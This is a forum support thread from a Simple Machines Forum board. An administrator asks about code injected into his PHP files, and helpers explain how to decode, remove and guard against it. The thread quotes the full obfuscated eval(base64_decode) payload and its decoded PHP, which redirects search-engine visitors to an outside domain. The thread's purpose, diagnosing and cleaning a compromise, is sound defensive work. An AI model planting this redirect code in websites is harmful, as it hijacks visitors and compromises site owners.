Advertisement:

Author Topic:  at the beginning of php files  (Read 5228 times)

Offline T3CHN0

  • Full Member
  • ***
  • Posts: 630
  • Gender: Male
  • knowledge is power
    • Tarago Pravia Estima
 at the beginning of php files
« on: September 19, 2011, 08:09:04 AM »
Hello


Can anyone tell me what this is in front of my php files.
Display.template.php and load.php so far that's the php files I have noticed it.



Code: [Select]
<?php
/**
 * Simple Machines Forum (SMF)


I am going to remove it so it looks like this



Code: [Select]
<?php
/**
 * Simple Machines Forum (SMF)


I hope I don't get any problems doing so.
but please anyone let me know
Code: [Select]
if 

should it be in my files


cheers

Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re:  at the beginning of php files
« Reply #1 on: September 19, 2011, 08:33:17 AM »
No, it shouldn't be in your files at all.
It's fine to remove these chars.

Did you by install any mod?


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline T3CHN0

  • Full Member
  • ***
  • Posts: 630
  • Gender: Male
  • knowledge is power
    • Tarago Pravia Estima
 at the beginning of php files & eval(base64_decode("ZXJyb3Jfcm
« Reply #2 on: September 19, 2011, 11:48:04 AM »
Hello
Yes I have installed many mods, My forum was attacked by a leaching rouge and all my files had
something like this at the beginning of each php file

Code: [Select]
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQodirecly after <?php

I upgraded my site from 2.0 rc3 to 2.0 last week but was attacked again 2 days after.
so I rebuild the hole 2.0 forum again fresh with new install but after removing
Code: [Select]


within about 30minutes later I noticed files started having the
Code: [Select]
eval(base64_decode(again and not long after every php file I edit was leached again.

I have turned on with my host leach security to try stop this from happening again
but any other idea's to protect my site would be appreciated


at this point in time I am going over every file in my forum 1 by 1 and removing the leach string
to try and recover my forum without having to rebuild another time.


cheers

kat

  • Guest
Re:  at the beginning of php files
« Reply #3 on: September 19, 2011, 12:20:00 PM »
Maybe... This?

http://custom.simplemachines.org/mods/index.php?mod=2815

I'm curious as to how they keep getting in, though.

Has your host checked their access logs and stuff?

Are they a good host?

Offline T3CHN0

  • Full Member
  • ***
  • Posts: 630
  • Gender: Male
  • knowledge is power
    • Tarago Pravia Estima
Re:  at the beginning of php files
« Reply #4 on: September 19, 2011, 12:46:00 PM »
Thankyou so much for that link to firewall mod, never thought of searching for a firewall mod

I'm with bluehost and I have never had a problem with them in the passed.
good speeds and allot of room for data.


they probably haven't checked access logs and stuff, am I able to do it?

how they keep getting in "Well only a matter of time before a hack is made" that's what we can expect
with anything in our days. I don't know how but it keeps getting in.

I do set all my files permissions to 755 - would that allow access?

here is the complete leach string and anyone knows how to decode it and find out where it's directed at
Code: [Select]
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICghJHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsNCglleGl0KCk7DQp9DQp9DQoJfQ0KCX0="));

MrPhil

  • Guest
Re:  at the beginning of php files
« Reply #5 on: September 19, 2011, 12:51:19 PM »
Change "eval" to "print" and it should display the code inside, rather than running it. You probably won't like what you see, but it might give you a hint as to how they're getting in. Not only should you clean up all SMF files, but erase all other files on your site that you can't account for. Scan all PCs used to administer your site for spyware and viruses (especially keystroke loggers and password sniffers). Then change all passwords -- FTP, site control panel, SMF admin IDs, etc. Talk to your host about access logs and see if they can see someone getting in.

Offline T3CHN0

  • Full Member
  • ***
  • Posts: 630
  • Gender: Male
  • knowledge is power
    • Tarago Pravia Estima
Re:  at the beginning of php files
« Reply #6 on: September 19, 2011, 12:59:24 PM »
Thanks.
I will do all of what you said.


by the way, where would I put the string with print to see anything.
in a empty php file?

Offline T3CHN0

  • Full Member
  • ***
  • Posts: 630
  • Gender: Male
  • knowledge is power
    • Tarago Pravia Estima
Re:  at the beginning of php files
« Reply #7 on: September 19, 2011, 01:26:43 PM »
don't know if this info is any good.
but cleaning my files and i'm back in my themes/default folder and see
Code: [Select]
 is back in my Display.template.php file
that means what ever it is will keep coming back.


How do I stop that happening?

kat

  • Guest
Re:  at the beginning of php files
« Reply #8 on: September 19, 2011, 01:30:38 PM »
Quote
I do set all my files permissions to 755 - would that allow access?

I believe that is like having a big notice on your site saying "Please hack me!". (Well, not quite that bad, but...)

Go to Admin>Packages>File permissions.

Set that to "Standard" and I think you'll be better off.

Offline Illori

  • Project Manager
  • SMF Legend
  • *
  • Posts: 51,412
Re:  at the beginning of php files
« Reply #9 on: September 19, 2011, 02:13:03 PM »
K@ no, 777 is world write/readable 755 is not.

kat

  • Guest
Re:  at the beginning of php files
« Reply #10 on: September 19, 2011, 02:22:07 PM »
Yeah, I know.

Would you leave your forum with every file at 775, though?

Offline Illori

  • Project Manager
  • SMF Legend
  • *
  • Posts: 51,412
Re:  at the beginning of php files
« Reply #11 on: September 19, 2011, 02:24:07 PM »
they said 755 not 775, 755 is REQUIRED by many servers that are more _secure_. 755 keeps others from being able to view your folders, but files need to be 644 not 755.

MrPhil

  • Guest
Re:  at the beginning of php files
« Reply #12 on: September 19, 2011, 02:30:09 PM »
by the way, where would I put the string with print to see anything.
in a empty php file?
Code: [Select]
<?php
print(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICghJHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsNCglleGl0KCk7DQp9DQp9DQoJfQ0KCX0="));
?>


MrPhil

  • Guest
Re:  at the beginning of php files
« Reply #13 on: September 19, 2011, 02:31:30 PM »
they said 755 not 775, 755 is REQUIRED by many servers that are more _secure_. 755 keeps others from being able to view your folders, but files need to be 644 not 755.
K@ needs a new pair of reading glasses...

kat

  • Guest
Re:  at the beginning of php files
« Reply #14 on: September 19, 2011, 02:54:25 PM »
You're right, there.

I DID read it as 775.

I blame Runic for late nights in wet fields. ;)

Offline T3CHN0

  • Full Member
  • ***
  • Posts: 630
  • Gender: Male
  • knowledge is power
    • Tarago Pravia Estima
Re:  at the beginning of php files
« Reply #15 on: September 19, 2011, 07:38:42 PM »
755 keeps others from being able to view your folders, but files need to be 644 not 755.
So simply, all folders should be 755 and all php files 644


I still can't Go to Admin>Packages>File permissions. to set file permission as my forum is still down.
I will do the permissions my self.

I have almost finished removing all leaches and will put my new user name and password
into settings soon to test it and see if my forum is working again.
« Last Edit: September 19, 2011, 07:41:53 PM by techno489 »

Offline T3CHN0

  • Full Member
  • ***
  • Posts: 630
  • Gender: Male
  • knowledge is power
    • Tarago Pravia Estima
Re:  at the beginning of php files
« Reply #16 on: September 20, 2011, 01:15:24 AM »
by the way, where would I put the string with print to see anything.
in a empty php file?
Code: [Select]
<?php
print(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICghJHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsNCglleGl0KCk7DQp9DQp9DQoJfQ0KCX0="));
?>



I did this and this is what I got.
means nothing to me


Code: [Select]
error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com") or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://prsnbrk.osa.pl/"); exit(); } } } }

Well I did everything said. forum firewall installed and forum back up and running with all leaching removed.
I will monitor my site as always and if anything happens like this again I will reply
and post to the thread if that's ok


cheers

MrPhil

  • Guest
Re:  at the beginning of php files
« Reply #17 on: September 20, 2011, 12:22:52 PM »
I did this and this is what I got.
means nothing to me
It means that if any of many popular search engines sent someone to your site, what they will see is some Polish site instead. You've been hijacked.

Offline T3CHN0

  • Full Member
  • ***
  • Posts: 630
  • Gender: Male
  • knowledge is power
    • Tarago Pravia Estima
Re:  at the beginning of php files
« Reply #18 on: September 20, 2011, 01:53:51 PM »
WOW. thanks for that... hopefully with forum firewall mod,  Bad Behavior mod, stop spammers mod, and leach protection from
my host that none of this will happen again...

Offline Illori

  • Project Manager
  • SMF Legend
  • *
  • Posts: 51,412
Re:  at the beginning of php files
« Reply #19 on: September 20, 2011, 01:55:12 PM »
that will only work if the code you are using is secure and your server is secure. those mods alone will not stop hackers.

kat

  • Guest
Re:  at the beginning of php files
« Reply #20 on: September 20, 2011, 01:58:40 PM »
Ultimately, your best defence is to read my sig... ;)

It won't stop the buggers, obviously.

But, if they DO screw your forum, you can go :P and put it straight back. :)